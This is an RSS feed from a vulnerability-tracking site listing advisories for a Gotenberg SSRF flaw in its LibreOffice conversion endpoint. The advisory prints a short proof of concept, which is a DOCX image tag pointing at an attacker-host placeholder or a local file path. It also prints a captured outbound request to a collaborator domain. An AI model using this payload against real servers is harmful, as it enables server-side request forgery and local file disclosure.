<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 16:01:42 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-336062</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-336062</link>
      <description>EUVD-2026-336062</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-336062</guid>
    </item>
    <item>
      <title>fkie_cve-2026-55229</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-55229</link>
      <description>&lt;p&gt;Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.34.0, Gotenberg&amp;#39;s /forms/libreoffice/convert endpoint allows a specially crafted document to cause LibreOffice to automatically retrieve external HTTP(S) resources and local file resources during document conversion, enabling blind SSRF and limited local file disclosure via linked image resource loading. This issue is fixed in version 8.34.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.34.0, Gotenberg&amp;#39;s /forms/libreoffice/convert endpoint allows a specially crafted document to cause LibreOffice to automatically retrieve external HTTP(S) resources and local file resources during document conversion, enabling blind SSRF and limited local file disclosure via linked image resource loading. This issue is fixed in version 8.34.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-55229</guid>
    </item>
    <item>
      <title>GHSA-2mrg-35hw-x3x9 — Gotenberg: SSRF via LibreOffice document processing</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-2mrg-35hw-x3x9</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/gotenberg/gotenberg/v8&lt;/p&gt;
&lt;p&gt;**Summary**&lt;/p&gt;
&lt;p&gt;Server-Side Request Forgery (SSRF) vulnerability affecting the `/forms/libreoffice/convert` endpoint in Gotenberg v8.33.0 running with the default configuration.&lt;/p&gt;
&lt;p&gt;By uploading a specially crafted DOCX document, an attacker can cause LibreOffice to automatically retrieve external resources during document conversion. As a result, outbound requests are made from the server hosting Gotenberg to attacker-controlled destinations.&lt;/p&gt;
&lt;p&gt;Additionally, the same document mechanism appears capable of referencing image resources from the local filesystem. During conversion, LibreOffice attempts to load those resources and embed them into the resulting document.&lt;/p&gt;
&lt;p&gt;**PoC**&lt;/p&gt;
&lt;p&gt;**External Resource Retrieval**&lt;/p&gt;
&lt;p&gt;Create a DOCX document containing the following content:&lt;/p&gt;
&lt;p&gt;`&amp;lt;img src=&amp;#34;http://[ATTACKER_HOST]:[PORT]/path?query=somedata&amp;#34;&amp;gt;`&lt;/p&gt;
&lt;p&gt;Upload the document to the `/forms/libreoffice/convert `endpoint.&lt;/p&gt;
&lt;p&gt;During document processing, LibreOffice automatically retrieves the referenced external resource.&lt;/p&gt;
&lt;p&gt;An outbound request can be observed on Burp Collaborator:&lt;/p&gt;
&lt;p&gt;```
GET /secretendpoint?query=hacked HTTP/1.1
Host: gotenbergssrf.3cguefu7x55rg8z13mzu08i45vbmzcn1.oastify.com
User-Agent: LibreOffice 26.2.3.2 denylistedbackend/8.20.0 OpenSSL/3.5.6
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
```&lt;/p&gt;
&lt;p&gt;**Local Resource Retrieval**&lt;/p&gt;
&lt;p&gt;Create a DOCX document containing the following content:&lt;/p&gt;
&lt;p&gt;`&amp;lt;img src=&amp;#34;/path/to/image.png&amp;#34;&amp;gt;`&lt;/p&gt;
&lt;p&gt;Upload the document to the `/forms/libreoffice/convert `endpoint.&lt;/p&gt;
&lt;p&gt;During doc…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/gotenberg/gotenberg/v8&lt;/p&gt;
&lt;p&gt;**Summary**&lt;/p&gt;
&lt;p&gt;Server-Side Request Forgery (SSRF) vulnerability affecting the `/forms/libreoffice/convert` endpoint in Gotenberg v8.33.0 running with the default configuration.&lt;/p&gt;
&lt;p&gt;By uploading a specially crafted DOCX document, an attacker can cause LibreOffice to automatically retrieve external resources during document conversion. As a result, outbound requests are made from the server hosting Gotenberg to attacker-controlled destinations.&lt;/p&gt;
&lt;p&gt;Additionally, the same document mechanism appears capable of referencing image resources from the local filesystem. During conversion, LibreOffice attempts to load those resources and embed them into the resulting document.&lt;/p&gt;
&lt;p&gt;**PoC**&lt;/p&gt;
&lt;p&gt;**External Resource Retrieval**&lt;/p&gt;
&lt;p&gt;Create a DOCX document containing the following content:&lt;/p&gt;
&lt;p&gt;`&amp;lt;img src=&amp;#34;http://[ATTACKER_HOST]:[PORT]/path?query=somedata&amp;#34;&amp;gt;`&lt;/p&gt;
&lt;p&gt;Upload the document to the `/forms/libreoffice/convert `endpoint.&lt;/p&gt;
&lt;p&gt;During document processing, LibreOffice automatically retrieves the referenced external resource.&lt;/p&gt;
&lt;p&gt;An outbound request can be observed on Burp Collaborator:&lt;/p&gt;
&lt;p&gt;```
GET /secretendpoint?query=hacked HTTP/1.1
Host: gotenbergssrf.3cguefu7x55rg8z13mzu08i45vbmzcn1.oastify.com
User-Agent: LibreOffice 26.2.3.2 denylistedbackend/8.20.0 OpenSSL/3.5.6
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
```&lt;/p&gt;
&lt;p&gt;**Local Resource Retrieval**&lt;/p&gt;
&lt;p&gt;Create a DOCX document containing the following content:&lt;/p&gt;
&lt;p&gt;`&amp;lt;img src=&amp;#34;/path/to/image.png&amp;#34;&amp;gt;`&lt;/p&gt;
&lt;p&gt;Upload the document to the `/forms/libreoffice/convert `endpoint.&lt;/p&gt;
&lt;p&gt;During doc…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-2mrg-35hw-x3x9</guid>
    </item>
  </channel>
</rss>
